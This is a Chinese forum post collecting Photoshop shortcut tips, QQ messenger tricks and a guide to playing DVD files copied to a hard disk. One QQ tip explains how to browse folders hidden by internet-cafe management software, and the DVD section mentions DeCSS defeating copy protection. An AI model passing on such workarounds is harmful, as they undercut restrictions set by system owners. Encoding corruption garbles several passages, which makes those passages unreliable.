[分享]电脑软件操作技巧
<br /><br />ADOBE PHOTOSHOP 鲜为人知的75个技巧[酷]<BR>Photoshop之所以在拥有强大功能的同时依然保持了良好的使用性, 很大程度上应该归功于其整齐精练的界面和简单易用的可自定义性( 除了 它大量的工具和命令 )。事实上,Photoshop中拥有大量令人惊异的“隐 藏”功能。无论你用过Photoshop多少年,都会不断发掘出越来越多的东 西。我怀疑会有谁宣称他知道关于Photoshop“所有”的东西( 可能ADOBE 的软件工程师要除外 )。 <BR><BR>下面的75个技巧将会帮助你( 无论你是新手还是经验丰富的专家 )掌 握Photoshop的一些“隐藏”功能,以助于更快更有效的完成复杂工作; 或者它们会告诉你一些你以前所不知道的PHTOSHOP的能力!为了您的方便 起见,我们把它们分为八个部分来讲: *界面技巧[↑] <BR><BR>1).你可能知道按Tab键可以隐藏工具箱和浮动面板,同样按Shift+Tab键 可以只隐藏浮动面板( 而保留工具条可见 )。 <BR><BR>2).按住Shift键点击浮动面板的标题栏( 最上方的?#123;条 )可以使其吸附 到最近的屏幕边缘。 <BR><BR>3).双击浮动面板的上的每一栏( 就是有标题的那个 )可以使其最小化。 通过浮动面板上的最小化按钮可以在紧凑模式( 只有最少的选项和内容可 视 )和正常模式( 显示面板上所有的选项和内容 )之间切换。 <BR><BR>4).可以通过按回车键( 或双击工具箱上的工具按钮 )来打开当前工具的 选项面板。不然的话只能通过菜单上的 Window/Show Options 命令来来 打开。 <BR><BR>5).利用比例缩放区( 在Photoshop窗体或导航器面板的左下角 )来快速 选择一个准确的显示比例,当输入一个值后按Shift+Enter可允构钸巳?保持在比例缩放区。 <BR><BR>6).要改变状态区的显示信息( 在窗口底部,默认显示文件大小,可以通 过Window/Show Status Bar打开 ),按状态区上的按钮从弹出菜单中选 一个新的项目。点击状态区上按钮的左侧区域可以显示当前文件的打印尺 寸、按住Alt点击显示文件尺寸和分辨率、按住Ctrl点击显示拼贴信息。 <BR><BR>7).厌倦了灰色的画布底色?选择油漆桶工具( Paint Bucket )按住 Shift点击画布边缘即可设置画布底色为当前的前景色。(注意:要还原 到默认的颜色,设置前景色为25%灰度( R192,G192,B192 )再次按住Shift 点击画布边缘。) <BR><BR>8).在Photoshop中所有的对话框中的取消( Cancel )按钮都可以通过按 住Alt键变为复位( Reset )按钮。这使你可以轻易回复到初始值而毋须取 消重来。 <BR><BR>9).键盘上的CapsLock键可以控制光标在精确状态及标准状态之间切换。 注意:如果Photoshop的参数 ( File/Preferences/ Display & Cursors... ) 中已经设置光标为精确状态,这时CapsLock键 不起作用。 <BR><BR>10).按“F”键可在Photoshop的三种不同屏幕显示方式 ( 标准显示模式→ 带菜单的全屏显示模式→全屏显示模式 )下切换( 或者可以使用工具箱下 端的按钮 )。提示:在全屏模式下按Shift+F可以切换是否显示菜单。 双击Photoshop的背景空白处为打开文件命令( File/Open)。 <BR><BR>11).按住Shift点击颜色面板下的颜色条可以改变其所显示的色谱类型。 或者,也可以在颜色条上单击鼠标右键,从弹出的颜色条选项菜单中选取 其它色彩模式。 <BR><BR>12).在图片窗口的标题栏上单击鼠标右键可以快速?#123;用一些命令,如画布 大小命令、图像大小命令和复制等等。 在?#123;色板面板上的任一空白( 灰色 )区域单击可在?#123;色板上加进一个 自定义的颜色,按住Ctrl键点击为减去一个颜色,按住Shift点击为替换 一个颜色。 <BR><BR>13).通过拷贝粘贴Photoshop拾色器中所显示的16进制颜色值,可以在 Photoshop和其它程序( 其它支持16进制颜色值的程序 )之间交换颜色数据。 <BR><BR>*工具技巧[↑] <BR><BR>14).要使用画笔工具画出直线,首先在图片上点击,然后移动鼠标到另一 点上按住Shift再次点击图片,Photoshop就会使用当前的绘图工具在两点 间画一条直线。 <BR><BR>15).任何时候按住Ctrl键即可切换为移动工具,按住Ctrl+Alt键拖动 鼠标可以复制当前层或选区内容。 <BR><BR>16).按住空格键可以在任何时候切换为抓手工具( Hand Tool )。 <BR><BR>17).缩放工具的快捷键为“Z”,此外Ctrl+空格键为放大工具,Alt+空 格键为缩小工具。 <BR><BR>18).按Ctrl+“+”键以及“-”键分别为放大和缩小图像的视图;相对应 的,按以上热键的同时按住Alt键可以自动?#123;整窗口以满屏显示( Ctrl+Alt+ “+”和Ctrl+Alt+“-” ),这一点十分有用!(注意:如果想要在使用 缩放工具时按图片的大小自动?#123;整窗口,可以在缩放工具的选项中选中“ ?#123;整窗口大小以满屏显示( Resize Windows to Fit )”选项。) <BR><BR>19).用吸管工具选取颜色的时候按住Alt键即可定义当前背景色。 <BR><BR>20).结合颜色取样器工具( Color Sampler Tool )和信息面板 ( Window/Show Info ),我们可以监视当前图片的颜色变化。变化前后 的颜色值显示在信息面板上其取样点编号的旁边。通过信息面板上的弹出 菜单可以定义取样点的色彩模式。要增加新取样点只需在画布上随便什么 地方再点一下( 用颜色取样器工具 ),按住Alt键点击可以除去取样点。 注意:一张图上最多只能放置四个颜色取样点 提示:当Photoshop中有对话框( 例如:色阶命令、曲线命令等等 )弹出 时,要增加新的取样点必须按住Shift键再点击,按住Alt+Shift点击一个 取样点可以减去它。 <BR><BR>21).度量工具( Measure Tool )在测量距离上十分便利( 特别是在斜 线上 ),你同样可以用它来量角度( 就像一只量角器 )。首先要保证信息 面板 ( Window/Show Info )可视。选择度量工具点击并拖出一 条直线,按住Alt键从第一条线的节点上再拖出第二条直线,这样两条线 间的夹角和线的长度都显示在 <BR><BR>*命令技巧[↑] <BR><BR>22).要再次使用刚用过的滤镜,从菜单中选Filter/Last Filter ;要用新的选项使用刚用过的滤镜记着多加一个Alt键( Ctrl+Alt+F or Alt + Filter/Last Filter )。 提示:要退去上次用过的滤镜或?#123;整的效果( 或改变合成的模式 ),按 Ctrl+Shift+F ( Filter ? Fade Filter )。 <BR><BR>23).如果你最近拷贝了一张图片存在剪贴板里,Photoshop在新建文件 ( File/New... )的时候会以剪贴板中图片的尺寸作为新建图的默认大小。 要略过这个特性而使用上一次的设置,在打开的时候按住Alt键 ( Alt + File ?New... )。 <BR><BR>24).按Ctrl+Alt+Z和Ctrl+Shift+Z组合键分别为在历史记录中向后和向前 ( 或者可以使用历史面板中的菜单来使用这些命令 )。结合还原 ( Edit/Undo )命令使用这些热键可以自由地在历史记录和当前状态中切 换。 <BR><BR>25).Alt+Backspace和Ctrl+Backspace组合键分别为填充前景色和背景色, 另一个非常有用的热键是Shift+Backspace––打开填充对话框。 提示:按Alt+Shift+Backspace及Ctrl+Shift+Backspace组合键在填充前 景及背景色的时候只填充已存在的像素( 保持透明区域 )。 <BR><br /><br />26).在使用自由变换工具 ( Edit/Free TransFORM )时按住Alt 键( Ctrl+Alt+T 或 Alt + Edit/Free TransFORM )即可先复制原图层( 在当前的选区 )后在复制层上进行变换。 提示:Ctrl+Shift+T ( Edit/TransFORM ? Again )为再次执行上次的变 换,Ctrl+Alt+Shift+T( Alt + Edit/TransFORM/Again )为复制原图后 再执行变换。 <BR><BR>27).要防止使用裁切工具( Crop Tool )时选框吸附在图片边框上,在 拖动裁切工具选框上的控制点的时候按住Ctrl键即可。 <BR><BR>28).要修正倾斜的图像,先用测量工具在图上可以作为水平或垂直方 向基准的地方画一条线( 像图像的边框、门框、两眼间的水平线等等 ), 然后从菜单中选Image/Rotate Canvas/Arbitrary,打开后会发现正确 的旋转角度已经自动填好了,只要按确定就OK啦。 注意:也可以用裁切工具来一步完成旋转和剪切的工作:先用裁切工具 画一个方框,拖动选框上的控制点来?#123;整选取框的角度和大小,最后 按回车实现旋转及剪切。提示:测量工具量出的角度同时也会自动填到数 字变换工具( Edit/TransFORM/Numeric )对话框中。 <BR><BR>29).使用“通过复制新建层 ( Layer/New/Layer Via Copy )” 或“通过剪切新建层 ( Layer/New/Layer Via Cut )”命令可 以在一步之间完成拷贝 & 粘贴和剪切 & 粘贴的工作。 注意:通过复制( 剪切 )新建层命令粘贴时被仍放在它们原来的地方,然 而通过拷贝( 剪切 )&粘贴会贴到图片( 或选区 )的中心。 <BR><BR>30).裁剪图像( 使用裁剪工具或选Edit/Crop )后所有在裁剪范围之外的 像素就都丢失了。要想无损失地裁剪可以用“画布大小( Image/Canvas Size )”命令来代替。虽然Photoshop会警告你将进行一些剪切,但出于 某种原因事实上并没有––所有“被剪切掉的”数据都被保留在画面以外。 提示:ImageReady的剪切命令( Image/Crop )会提问要删除剪切区域还 是隐藏起来。注意:这对索引色模式不起作用( 在索引模式下用画布大小 命令会损失画面以外的像素 )。 <BR><BR>31).合并可见图层时按住Alt键 ( Alt + Layer/ Merge Visible )为把所有可见图层复制一份后合并到当前图层。 提示:同样可以在合并图层( Layer/Merge Down )的时候按住Alt键,会 把当前层复制一份后合并到前一个层。这个命令没有相应的热键–– Ctrl+Alt+E不起作用。 <BR><BR>*选择技巧:[↑] <BR><BR>32).使用选框工具( Marquee Tools )的时候,按住Shift键可以划出 正方形和正圆的选区;按住Alt键将从起始点为中心勾划选区。 <BR><BR>33).使用“重新选择”命令 ( Select/Reselect )来载 入/恢复之前的选区。 <BR><BR>34).在使用套索工具勾画选区的的时候按Alt键可以在套索工具和和多边 形套索工具间切换。 <BR><BR>35).勾画选区的时候按住空格键可以移动正在勾画的选区。 <BR><BR>36).众所周知按住Shift或Alt键可以增加或修剪当前选区,但你是否知道 同时按下Shift和Alt键勾画可以选取两个选区中相交的部分呢? 提示:按住Ctrl键点击层的图标( 在层面板上 )可加载它的透明信道,再 按住Ctrl+Alt+Shift键点击另一层为选取两个层的透明信道相交的区域。 <BR><BR>37).在缩放或复制图片之间先切换到快速蒙板模式可保留原来的选区。 <BR><BR>38).使用层的技巧[↑] <BR><BR>39).按Shift+“+”键( 向前 )和Shift+“-”键( 向后 )可在各种层的 合成模式上切换。我们还可以按Alt+Shift+“某一字符”快速切换合成模式。 <BR><BR>N = 正常 ( Normal ) <BR><BR>I = 溶解 ( Dissolve ) <BR><BR>M = 正片叠底 ( Multiply ) <BR><BR>S = 屏幕 ( Screen ) <BR><BR>O = 叠加 ( Overlay ) <BR><BR>F = 柔光( Soft Light ) <BR><BR>H = 强光( Hard Light ) <BR><BR>D = 颜色减淡 ( Color Dodge ) <BR><BR>B = 颜色加深 ( Color Burn ) <BR><BR>K = 变暗 ( Darken ) <BR><BR>G = 变亮 ( Lighten ) <BR><BR>E = 差值( Difference ) <BR><BR>X = 排除 ( Exclusion ) <BR><BR>U = 色相 ( Hue ) <BR><BR>T = 饱和度 ( Saturation ) <BR><BR>C = 颜色 ( Color ) <BR><BR>Y = 亮度( Luminosity ) <BR><BR>Q = 背后( Behind 1 ) <BR><BR>L = 阈值( Threshold 2 ) <BR><BR>R = 清除 ( Clear 3 ) <BR><BR>W = 暗?#123;( Shadows 4 ) <BR><BR>V = 中间?#123;( Midtones 4 ) <BR><BR>Z = 高光( Highlights 4 ) <BR><BR>有编号的对以下情况有效:[注1] <BR><BR>仅在“保留透明区域”关闭的图层中工作 <BR><BR>索引色模式( Indexed Mode ) <BR><BR>多图层图片上用直线( Line )和油漆桶工具 ( Bucket Tools ) <BR><BR>减淡和加深工具( Dodge and Burn Tools ) <BR><BR>40).直接按底宙I即可改变当前工具或图层的不透明度。按“1”表示10% 不透明度,“5”为50%,以此类推,“0”为100%不透明度。连续按数字 键比如“85”表示不透明度为85%。 注意:以上热键同样对当前的绘图类工具有效,所以如果你要改变当前层 的不透明度,先转到移动工具或某一选取工具。 <BR><BR>41).按住Alt点击所需层前眼睛图标可隐藏/显现其它所有图层。 <BR><BR>42).按住Alt点击当前层前的笔刷图标可解除其与其它所有层的链接。 <BR><BR>43).要清除某个层上所有的层效果,按住Alt键双击该层上的层效果图标; 或者在菜单中选Layer/Effects/Clear Effects。 提示:要关掉其中一个效果,按住Alt键然后在Layer/Effects子菜单中 选中它的名字。或者可以在图层效果对话框中取消它的“应用”标记。 <BR><BR>44).在层面板中按住Alt键在两层之间点击可把他们编为一组。当一些层 链接在一些而你又只想把它们中的一部分编组时这个功能十分好用( 因为 编组命令 ( Layer/Group with Previous )在当前层与其它层 有链接时会转为编组链接层命令 ( Layer/Group Linked ) )。 <BR><BR>45).这里有一个节省时间的增加?#123;整层( Layer/New/Adjustment Layer) 的方法:只需按住Ctrl点击“创建新图层“图标( 在层面板的底部 )选择 你想加的?#123;整层类型! <BR><BR>
<br /><br />46).按Alt键点击删除按钮( 在层面板的底部 )可以快速删除层( 无须确 认 ),同样这也适用于信道和路径。 除了在信道面板中编辑层蒙板以外,按Alt点击层面板上蒙板的图标 可以打开它;按住Shift键点击蒙板图标为关闭/打开蒙板( 会显示一个红 叉X表示关闭蒙板 )。按住Alt+Shift点击层蒙板可以以红宝石色( 50%红 ) 显示。按住Ctrl键点击蒙板图标为加载它的透明选区。 <BR><BR>47).按层面板上的“添加图层蒙板”图标( 在层面板的底部 )所加入的蒙 板默认显示当前选区的所有内容( Layer/Add Layer Mask/Reveal All ); 按住Alt键点“添加图层蒙板”图标所加的蒙板隐藏当前选区内容( Layer /Add Layer Mask/Hide All )。 <BR><BR>48).点击路径面板上的空白区域可关闭所有路径的显示 提示:按Ctrl+Shift+H切换路径是否显示( View ? Show/Hide Path )。 <BR><BR>49).在点击路径面板下方的几个按钮( 用前景色填充路径、用前景色描边 路径、将路径作为选区加载 )时,按住Alt键可以看见一系列可用的工具 和/或选项。当前工具为移动工具( 或随时按住Ctrl键 )时,右键点击画 布可以打开当前点所有层的列表( 按从上到下排序 ):从列表中选择层的 名字可以使其为当前层。 提示:按住Alt键点鼠标右键可以自动选择当前点最靠上的层,或者打开 <BR><BR>50).移动工具选项面板中的自动选择图层选项也可实现。 提示:再按住Shift键( Alt+Shift+右键点击 )可以切换当前层是否与最上面层作链接。 <BR><BR>51).辅助线和标尺的技巧[↑] <BR><BR>52).拖动辅助线时按住Alt键可以在水平辅助线和垂直辅助线之间切换。 按住Alt键点击一条已经存在的垂直辅助线可以把它转为水平辅助线,反之亦然。 <BR><BR>53).注意:辅助线是通过从标尺中拖出而建立的,所以要确保标尺是打开 的 ( View/Show Rulers )。 <BR><BR>54).拖动辅助线时按住Shift键将强制其对齐到标尺上的刻度。 <BR><BR>55).双击辅助线可以打开辅助线 & 风格参数设置对话框 ( File/Preferences/Guides & Grid)。 <BR><BR>56).双击标尺可以打开单位 & 标尺参数设置对话框 ( File/Preferences/Units & Rulers)。 提示:也可以在信息面板上的选项菜单中选择标尺度量单位。 <BR><BR>57).标尺的坐标原点可以设置在画布的任何地方,只要从标尺的左上角开 始拖动即可应用新的坐标原点;双击左上角可以还原坐标原点到默认点。 <BR><BR>58).利用路径工具创建曲线和斜线的辅助线也不失为一个好办法。只要用 钢笔工具描绘路径即可在绘制上或上色时作为辅助线( 路径始终保持可视 )。提示:使用隐藏路径命令 ( View ? Hide Path )切换路 径显示与否。 <BR><BR>59).辅助线不仅会吸附在当前层或选区的边缘( 上下左右 ),而且会也以 ( 当前层或选区的 )水平或垂直中心对齐。反过来也一样:同样选区和层 也会吸附到已经存在的辅助线上( 边缘和中心 )。 注意:辅助线不会吸附到背景层上。而且要实现上述功能先要打开“贴紧 辅助线” ( View/Snap To Guides )选项。 提示:要找到画面的中心可以新建并 ( Layer/New Layer) 并填充 ( Edit/Fill)一个层然后把辅助线吸附到垂 直中心和水平中心上。 <BR><BR>60).导航器和动作的技巧[注1][↑] <BR><BR>很多时候用键盘来控制导航器( navigation )比用鼠标更快捷。这里 列出了一些常用的导航器热键: <BR><BR>Home = 到画布的左上角 <BR><BR>End = 到画布的右下角 <BR><BR>PageUp = 把画布向上滚动动一页 <BR><BR>PageDown = 把画布向下滚动动一页 <BR><BR>Ctrl+PageUp = 把画布向左滚动动一页 <BR><BR>Ctrl+PageDown = 把画布向右滚动动一页 <BR><BR>Shift+PageUp = 把画布向上滚动10个像素 <BR><BR>Shift+PageDown = 把画布向下滚动10个像素 <BR><BR>Ctrl+Shift+PageUp = 把画布向左滚动10个像素 <BR><BR>Ctrl+Shift+PageDown = 把画布向右滚动10个像素 <BR><BR>61).使用Ctrl+Tab/Ctrl+F6在多个文档中切换( 或者也可以使用Window 菜单 ),十分方便! <BR><BR>62).用恢复命令 ( File/Revert )以把当前文档恢复到上次保存时 的状态。警告!在Photoshop5.0中,恢复命令会同时清空历史记录!这意 味着一旦使用恢复命令上次保存后所有的改动都会丢失!Photoshop5.5更 正了这一点。 <BR><BR>63).CHANNEL也有其默认对应的热键。这对于存为信道形式的选区/蒙板之间 作加、减和相交运算就变得十分快捷和简单。这里列出了一些常用模式: <BR><BR>RGB颜色 CMYK颜色 索引颜色 <BR><BR>Ctrl+“~”= RGB <BR><BR>Ctrl+1 = 红 <BR><BR>Ctrl+2 = 绿 <BR><BR>Ctrl+3 = ?#123; <BR><BR>Ctrl+4 = 其它信道 <BR><BR>Ctrl+9 =其它信道 <BR><BR>Ctrl+“~” = CMYK <BR><BR>Ctrl+1 = 青色 <BR><BR>Ctrl+2 = 洋红 <BR><BR>Ctrl+3 = 黄色 <BR><BR>Ctrl+4 = 黑色 <BR><BR>Ctrl+5 = 其它信道 <BR><BR>Ctrl+9 =其它信道 <BR><BR>Ctrl+1 = 索引 <BR><BR>Ctrl+2 = 其它信道 <BR><BR>Ctrl+9 =其它信道 <BR><BR>例如:要创建一个选区以表示信道7和信道9的相交部分,先按Ctrl+Alt+7 ( 把信道7加载为选区 )然后按by Ctrl+Alt+Shift+9( 再和信道9相交 )。 <BR><BR>64).按住Ctrl键在导航器的代理预览区域中拖放可以更新设定当前文文件的 可视区域。提示:在代理预览区域中拖动显示框时按住Shift键可以锁定 移动的方向为横向或垂直。提示:在导航器面板的面板选项中可以更改代 理预览区域中显示框的颜色。 <BR><BR>65).若只想执行动作( Action )中的单一步骤,选好要执行的步骤然后按 住Ctrl键点播放( Play )按钮( 在行为面板的底部 )。 注意:若要改变动作中部分命令的参数,双击相应的步骤以打开相关对话 框:任何新填入的数值都将自动存储。 <BR><BR>66).要从动作的某一步开始执行,只要选好开始的步骤然后按播放按钮 ( 在行为面板的底部 )即可。 <BR><BR>67).复制的技巧[↑] <BR><BR>68).可以用选框工具( Marquee Tool )或套索工具 ( Polygonal Lasso ),把选区从一个文档拖到另一个上。 把选择区域或层从一个文档拖向另一个时,按住Shift键可以使其在 目的文檔的上居中。 提示:如果源文檔和目的文檔的大小( 尺寸 )相同,被拖动的元素会被放 置在与源文文件位置相同的地方( 而不是放在画布的中心 )。 注意:如果目的文档包含选区,所拖动的元素会被放置在选区的中心。 <BR><BR>69).当要在不同文档间移动多个层时,首先把它们链接起来,然后就可以 利用移动工具在文档间同时拖动多个层了。 注意:不能在层面板中同时拖动多个层到另一个文档( 即使它们是链接起 来的 )––这只会移动所选的层。 <BR>
<br /><br />70).要把多个层编排为一个组,最快速的方法是先把它们链接起来,然后 选择编组链接图层命令 ( Layer/Group Linked )。之后可以按 自己的意愿取消链接。 注意:用这个技术同样可以用来合并 ( Layer/Merge Down )多 个可见层( 因为当前层与其它层有链接时“与前一层编组( Group with previous )命令”会变成“编组链接图层( Group Linked )”命令 )。 <br><br>71).有一个聪明的方法可以同时重新排列多个层( 在层面板里 ):先把所 要的层链接Group ( Layer/Group with Previous )起来,在 层面板中拖到一个新的地方再取消编组。 <br><br>72).要为当前历史状态或快照( Window/Show History )建立一个复制文 檔可以: <br><br>a ) 点击“从当前状态创建新文文件( New Document )”按钮 <br><br>b ) 从历史面板菜单中选择新文档 <br><br>c ) 拖动当前状态( 或快照 )到“从当前状态创建新文文件”按钮上 <br><br>d ) 右键点击所要的状态( 或快照 )从弹出菜单中选择新文档 <br><br>73).把历史状态中当前图片的某一历史状态拖到另一个图片的窗口可改变 目的图片的内容。 <br><br>74).按住Alt键点击任一历史状态( 除了当前的、最近的状态 )可以复制 它。而后被复制的状态就变为当前( 最近的 )状态。 <br><br>75).按住Alt拖动动作中的步骤可以把它复制到另一个动作中。
[此贴子已经被作者于2006-10-23 21:10:31编辑过]
<br /><br />QQ 10条最酷的秘技<BR><BR>QQ是大家使用最为广泛的一个聊天工具,我想有很多人连做梦都想成为QQ高手吧?也许有人会认为“QQ高手不就是那种对QQ基本功能操作很熟练的人吗?”大错特错!对“高手”的标准实在太低了吧,相信就算是“菜鸟”也能几天就搞定的。但是,要是你掌握一些非常特殊的绝技,呵呵,那你一定可以在朋友面前炫一把,让大家对你刮目相看了,地位自然也是一日千里地上升为真正的QQ高手。废话不多说了,下面让我赶紧告诉你这10条最酷的秘技吧! <BR><BR>灵验的登录方法<BR><BR>相信大家或多或少都有过这样的体验,登录QQ时,小企鹅在屏幕上徒劳地闪动半天之后,弹出来的却是服务器太忙无法登录或者超时的提示框,接连试几次都是这样的,真的有点烦人。别着急,用下面的方法一定能让你顺利登录上去的。 <BR>先说第一种方法。如果你使用的是默认登录面板登录的话,那么你可以改用“注册向导”试试,一般情况下都能成功。还不管用的话,就得使用更绝的第二种方法了——打开多个QQ窗口来同时登录同一个号码。我遇到上述情况就会同时打开三个窗口,这里面肯定会有一个能登录上去的,百试不爽。不过也有一种情况是例外的,那就是:网络断线的时候:)。 <BR><BR>快速定位好友<BR><BR>现在在一个QQ里加有好几百号人是不足为奇的事,但是Q友多了也会给自己添麻烦的哟!想想看,要在这么一大堆人里找到某某MM可不是件容易的事。怎么办?跟我做吧!首先激活QQ面板,切换到某某MM所在的组,然后在键盘上按下好友昵称的首字母(如“Vc水手”取首字母“V”,而“维C水手”取拼音“wei”的首字母“W”就定位到了一组以此字母为昵称首字母的好友了,现在找起人来方便了许多吧!<BR><BR>回到好友列表顶端 <BR>当你在QQ某个组中按了向下按钮又想回到列表顶端时,你没有必要再去按那个向上按钮了。有一个化繁为简的方法是:试着与其他任何一个组之间切换一下,再回到原先的组看一看,呵呵,奇迹出现了,你又回到顶端了。<BR><BR>打造个性的资料 <BR>你有没有发现有些人QQ资料填得很特别很有个性呢?比如“国家/地区”填的根本不是下拉列表中的内容,甚至可以换成一个贴图,你会觉得不可思议吧?其实你也完全可以拥有这么个性的资料的。实现方法很简单,在填写资料时你可以不理会那些下拉列表,直接填入你想填的内容即可(贴图可以到专门的网站去Copy)。但请注意并不是所有下拉列表都是形同虚设的,有些内容必须择其一才能填入。<BR><BR>让头像伤心前排 <BR>想更多地吸引MM对你的注意吗?那你在她的列表中的位置可一定要排得伤心前一些哟!要不然人家可能会看不到你或者对你视而不见……用不着生气,想个法子让自己排得伤心前些不就行了吗!好,为了帮你实现“企图”,这一招我教定你了。Follow me,打开“个人设定”窗口,然后在自己的昵称前点一下鼠标,再按空格键插入一两个空格(不能太多了,要不然昵称就不能完整显示了),然后点击“修改”按钮进行修改。这样,以后当对方更新了你的资料或者重新登录时,你的头像就可以排在其列表数一数二的显赫位置了(在线的情况下),现在对方要想不看见你都不可能啦。 <BR>同理,想把谁放到你的好友列表顶端,就给他“改名”,在他名字前加一两个空格就行。<BR><BR>把自己加为好友 <BR>这一招可是厉害得很,可以让自己的头像出现在本身的列表上,这不仅显得很酷,而且有很实用得功能哦(比如下面一条秘技中就可以用到)!其实最早期的QQ版本中是可以直接把自己加为好友的,但现在的版本都行不通了。但是只要我们肯动手,没有什么能难倒我们的。步骤如下: <BR>首先建议设定到“允许任何人把我列为好友”,然后切换到“黑名单”组,在里面空白处点击右键并选“添加坏人名单”,输入自己的QQ号码(什么?把我自己当成坏人了呀!),接下来再把这个“坏人”拖到“我的好友”组中去,这时会弹出“不能添加自己”的提示,不理会它,直接退出QQ。 <BR>再一次用注册向导登录时(注意这里一定要用注册向导!),就可以看见自己的头像已经在列表中了,而且,还可以和“自己”说话呢! <BR><BR>查看隐藏的文件夹 <BR>有时我们在网吧上网需要查看某些文件夹,无奈管理软件却把它们给隐藏起来了,怎么也打不开。有了QQ就好办了,你可以利用它来另类地打开这些文件夹。方法是:在机器中打开两个QQ号码甲和乙(如果没有两个号码,可以用注册向导,在自己号码前加一个“0”登录,登录后显示号码为“0xxxxxxx”),用左键在甲中点击乙的头像并选择“传送文件”,接着随便在电脑中找个小一些的文件进行传送,由乙来接收,很快就会接收完毕,弹出了一个很关键的窗口,提示“文件接收完毕,是否转到文件所在目录?”,这时请一定点击“是”按钮。 <BR>嘿嘿,现在可以随心所欲地查看该文件夹了吧!<BR><BR>与不喜欢的人“永别” <BR>俗话说“林子大了,什么鸟都有”,在用QQ聊天时我们也会有碰到“坏鸟”的。你把对方删除掉也不见得能得到清净,他(她)还是可以在陌生人里喋喋不休地骚扰你。隐患就在于你的头像还保留在对方的列表里。所以我要提醒你,以后遇到这样的情况一定不能手软,就一定要毫不犹豫地把“坏鸟”拖入“黑名单”中。这样,双方都会彻底地从对方列表中消失了,也就没有人能烦到你了。当然如果对方已经赖在“陌生人”里了也还有补救措施,很简单,同样把这个人拖入“黑名单”就行了。<BR><BR>让数据重见天日 <BR>作为在网吧使用QQ的用户,由于经常“行踪不定”,学会QQ数据的备份与恢复是很重要的。如果只要备份QQ消息数据(包括聊天记录、用户信息以及系统消息等)可以直接用“消息管理器”来实现。操作很简单,我就不多说了。如果要备份全部的数据信息(还包括用户信息、分组信息、好友列表等),你就应该找到一个以你的QQ号码命名的用户目录文件夹(默认路径在C:\Program Files\Tencent下),把它备份就可以了。这些备份数据一般都不大,你完全可以压缩后把它作为附件发送到E-mail里,下次在别处使用QQ时再下载过来,然后通过“消息管理器”把消息数据导入或者用目录文件覆盖同名目录(注意之前要先登录一次,退出后覆盖),这样就大功告成,你的数据资料又奇迹般地回来了!<BR><BR>简单有效的防黑术 <BR>现在网上(特别是网吧)盗取QQ密码的方法层出不穷,搞得QQ用户人人自危。有一种通过监视来获得密码的工具更是防不胜防,它一般在本地机器中隐藏运行,会自动记录那些号码位数不超过9位的QQ登录密码,甚至还可以自动把这些密码发送到指定的邮箱。基于它的原理,我们就可以采取对应的防黑措施了。具体做法是:在登录的时候,在号码前加入一串的“0”(比如20个),我们会发现这并不影响正常的登录,但是你在本地机器上的号码却变成了一大串的“0”。这样一来,再聪明的监视盗号工具也会对这种长号码不理不睬了,当然你也就不必担心QQ密码泄露了 <BR>"轻用其芒,动即有伤,是为凶器;深藏若拙,临机取决,是为利器。HK不是从真正意义上的去黑,而是挑战自己,挑战困难,坚毅,执著,智慧……"
<br /><br />把DVD影片拷贝到硬盘上观看<BR><BR>早在VCD格式光盘流行的年代,电脑爱好者们就经常将光盘中Mpegav目录下的影音文件直接拷贝到硬盘上,然后再进行影片的播放,以此来减少光驱的耗损。虽然DVD影片光盘在制定标准时就考虑到要通过技术措施来防止拷贝,但DeCSS软件的出现使得其保护措施形同虚设,因此我们现在见到的绝大多数DVD影片光盘中的文件都是可以直接进行拷贝的。与此同时,电脑上DVD光驱的普及率越来越高,其数据读取速度已经高达16倍速(21MB/s),而硬盘的容量也越来越大,80GB已经成为了标准配置,这一切都为我们将DVD影片拷贝到硬盘上播放提供了很好的条件。<BR><BR>但是,由于DVD影片光盘需要实现一些诸如多语言多字幕之类的新功能,像VCD光盘那样单纯拷贝影音文件的方法看起来已经不再适用了。为了能够在硬盘上播放DVD影片,有人提出了使用虚拟光驱软件将DVD影片光盘生成映像文件,然后再通过虚拟光驱进行播放的方法。而事实上,基于对DVD影片文件本身特征的了解,我们完全没有必要如此大费周章。下面我来给大家介绍一下将DVD影片拷贝到硬盘上播放的原理和方法。<BR><BR>首先让我们来看一下DVD影片光盘的文件结构。通常情况下,光盘上会有两个文件夹:Audio_ts和Video_ts:由于Audio_ts是保留给DVD版的激光唱片DVD-AUDIO使用的,所以在DVD影片光盘中,这个文件夹是空的;而Video_ts中则保存着影片所有的视频音频和字幕信息。因此我们只需要把这个文件夹拷贝到硬盘上就可以了,而且拷贝后文件夹的名字也可以根据需要进行随意更改。<BR><BR>接下来我们来看一下这个拷贝过来的文件夹中都包含有哪些文件。依照DVD影片光盘(DVD-VIDEO)标准的规定,一个标准的Video_ts文件夹中应该包含三种类型的文件:VOB、IFO、BUP,下面我们再来分别看一下它们各自的作用。<BR><BR>VOB(Video OBjects视频目标文件):VOB文件用来保存DVD影片中的视频数据流、音频数据流、多语言字幕数据流以及供菜单和按钮使用的画面数据。由于一个VOB文件中最多可以保存1个视频数据流、9个音频数据流和32个字幕数据流,所以DVD影片也就可以拥有最多9种语言的伴音和32种语言的字幕。<BR><BR>IFO(InFOrmation信息文件):IFO文件用来控制VOB文件的播放。文件中保存有怎样以及何时播放VOB文件中数据的控制信息,比如段落的起始时间、音频数据流的位置、字幕数据流的位置等信息。DVD机或者播放软件通过读取IFO文件,才能把组成DVD影片的各种数据有机地结合起来进行播放。<BR><BR>BUP(BackUP备份文件):BUP文件和IFO文件的内容完全相同,是IFO文件的备份。由于IFO文件对于保证影片的正常播放非常重要,所以需要保留一个副本,以备在IFO文件的读取发生错误时仍然可以通过读取BUP文件来得到相应的信息。<BR><BR>通过以上的介绍我们可以看出,只要使播放软件读取IFO文件就可以达到控制DVD影片中所有功能的目的。那么如何实现呢?实际上非常简单,我们广泛使用的DVD播放软件PowerDVD XP 4.0本身就已经提供了这一功能:启动PowerDVD XP 4.0后按下组合键Ctrl-o或者用鼠标单击播放控制面板上的“选择源文件”按钮,然后点选“打开硬盘上的DVD文件”菜单项,接着在弹出的对话框中选择已经拷贝在硬盘上的Video_ts文件夹中的*.IFO文件,就可以像播放光盘中的DVD影片一样使用语言选择、字幕选择等所有的控制功能了,与在DVD光驱中直接播放别无二致。
<br /><br />
<br /><br />
